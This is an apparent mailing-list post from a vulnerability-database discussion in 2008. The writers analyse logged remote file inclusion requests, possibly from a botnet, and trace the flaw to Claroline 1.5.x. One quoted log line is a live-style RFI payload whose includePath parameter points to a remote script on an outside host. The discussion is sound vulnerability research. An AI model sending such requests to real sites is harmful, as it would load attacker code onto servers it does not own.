[VIM] RFI BotNet and phpBB 0-day?
jericho at attrition.org
Thu Mar 20 19:34:26 UTC 2008
: Dunno if it's a botnet but given Gadi's paper from last year on web
: server compromises, it's a really good theory.
I say that based on a few things i've seen, and I bet a real analysis
would very quickly prove or disprove the theory.
: > > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
: I looked at the 2.0.23 source.
: Using phpBB2 code: page_tail.php is in includes/ - so I wouldn't expect a
: /claroline/phpbb/page_tail.php to work. So, this is probably Claroline.
Well, don't base it just on that path. I see a LOT of obvious path request
I see these a hundred times a day and obviously will not work. So seeing
/claroline/ in front of the /phpbb/ request was odd, but I didn't take it
to mean it was necessarily claroline, even though it may be.
: But - no apparent luck:
: and no mention of includePath in that file.
: claro_init_footer.inc.php seems clean.
: Similar for 1.64.
: However - $includePath is used all over the place in Claroline, and
: apparently uses an unset(), so maybe there's a relationship with an unset
: 1.42 ZIP file seems corrupted, so I couldn't check it out.
Looks like an issue in Claroline 1.5.x fixed with the release of 1.5.5
back in 2006:
More information about the VIM